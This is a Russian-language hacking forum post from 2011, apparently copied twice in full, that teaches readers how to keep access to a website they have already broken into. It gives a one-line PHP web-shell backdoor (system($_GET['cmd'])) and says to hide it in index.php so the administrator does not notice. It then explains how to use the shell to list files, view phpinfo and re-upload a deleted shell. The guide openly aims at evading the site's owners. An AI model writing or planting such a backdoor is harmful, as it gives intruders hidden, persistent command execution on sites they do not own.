~Nero~
04.08.2011, 11:41
Бэкдор
Посидел,подумал и решил всетаки написать...
Для начала определение:
Бэкдор, backdoor (от англ. back door, чёрный ход) — программы, которые устанавливает взломщик на взломанном им компьютере после получения первоначального доступа с целью повторного получения доступа к системе. При подключении предоставляет какой-либо доступ к системе (как правило, это командный интерпретатор: в GNU/Linux — Bash, в Microsoft Windows NT — cmd). Взято с вики
Перейдем к примеру.
Для чего же нужны бэкдоры? Предположим такую ситуацию - вы взломали сайт, залили шелл, слили базу и т.д., но админ нашел шелл и удалил его, так вот, для этой беспалевности и нужен бэкдор. Просто вставим малозаметный код и все, админ не пропалит.
Ну а теперь более подробно:
Код самого простейшего бэкдора:
<?php
system($_GET['cmd']);
?>
Допустим вы залили шелл,ищем любой файл с расширением .php ,который можно редактировать. Для этой роли блестяще подойдет index.php . Открываем файл, вставляем код и сохраняем. Надо обратить внимание на то, что index.php уже имеет "<?php" и "?>" ,так что их вставлять не надо.
Далее...
Переходим на наш сайт (условно _[Ссылки могут видеть только зарегистрированные и активированные пользователи]) и видим что ничего не происходит....
Но стоит нам перейти на _[Ссылки могут видеть только зарегистрированные и активированные пользователи] мы видим список файлов находящихся в директории. Вуаля)
самые важные для нас функции бэкдора это:
_[Ссылки могут видеть только зарегистрированные и активированные пользователи] - как мы уже знаем, показывает список файлов в директории
_[Ссылки могут видеть только зарегистрированные и активированные пользователи] - узнаем phpinfo
_[Ссылки могут видеть только зарегистрированные и активированные пользователи] [Ссылки могут видеть только зарегистрированные и активированные пользователи] - а этот запрос повторно заливает шелл (хочу заметить, что пробел в ссылке обязателен!), на случай если все шеллы которые вы заливали удалил админ. Этот шелл будет доступен по адресу _[Ссылки могут видеть только зарегистрированные и активированные пользователи]
Я знаю что найдутся те,которые чего то не поняли в последней ссылке,так вот вам скрин
[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
Ахтунг!(внимание!) "[Ссылки могут видеть только зарегистрированные и активированные пользователи]"-это ссылка тоже условная,вместо нее должна быть ссылка на ваш шелл.
Ну вот и все) Спасибо за внимание.
Специально для Zhyk.ru
Посидел,подумал и решил всетаки написать...
Для начала определение:
Бэкдор, backdoor (от англ. back door, чёрный ход) — программы, которые устанавливает взломщик на взломанном им компьютере после получения первоначального доступа с целью повторного получения доступа к системе. При подключении предоставляет какой-либо доступ к системе (как правило, это командный интерпретатор: в GNU/Linux — Bash, в Microsoft Windows NT — cmd). Взято с вики
Перейдем к примеру.
Для чего же нужны бэкдоры? Предположим такую ситуацию - вы взломали сайт, залили шелл, слили базу и т.д., но админ нашел шелл и удалил его, так вот, для этой беспалевности и нужен бэкдор. Просто вставим малозаметный код и все, админ не пропалит.
Ну а теперь более подробно:
Код самого простейшего бэкдора:
<?php
system($_GET['cmd']);
?>
Допустим вы залили шелл,ищем любой файл с расширением .php ,который можно редактировать. Для этой роли блестяще подойдет index.php . Открываем файл, вставляем код и сохраняем. Надо обратить внимание на то, что index.php уже имеет "<?php" и "?>" ,так что их вставлять не надо.
Далее...
Переходим на наш сайт (условно _[Ссылки могут видеть только зарегистрированные и активированные пользователи]) и видим что ничего не происходит....
Но стоит нам перейти на _[Ссылки могут видеть только зарегистрированные и активированные пользователи] мы видим список файлов находящихся в директории. Вуаля)
самые важные для нас функции бэкдора это:
_[Ссылки могут видеть только зарегистрированные и активированные пользователи] - как мы уже знаем, показывает список файлов в директории
_[Ссылки могут видеть только зарегистрированные и активированные пользователи] - узнаем phpinfo
_[Ссылки могут видеть только зарегистрированные и активированные пользователи] [Ссылки могут видеть только зарегистрированные и активированные пользователи] - а этот запрос повторно заливает шелл (хочу заметить, что пробел в ссылке обязателен!), на случай если все шеллы которые вы заливали удалил админ. Этот шелл будет доступен по адресу _[Ссылки могут видеть только зарегистрированные и активированные пользователи]
Я знаю что найдутся те,которые чего то не поняли в последней ссылке,так вот вам скрин
[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
Ахтунг!(внимание!) "[Ссылки могут видеть только зарегистрированные и активированные пользователи]"-это ссылка тоже условная,вместо нее должна быть ссылка на ваш шелл.
Ну вот и все) Спасибо за внимание.
Специально для Zhyk.ru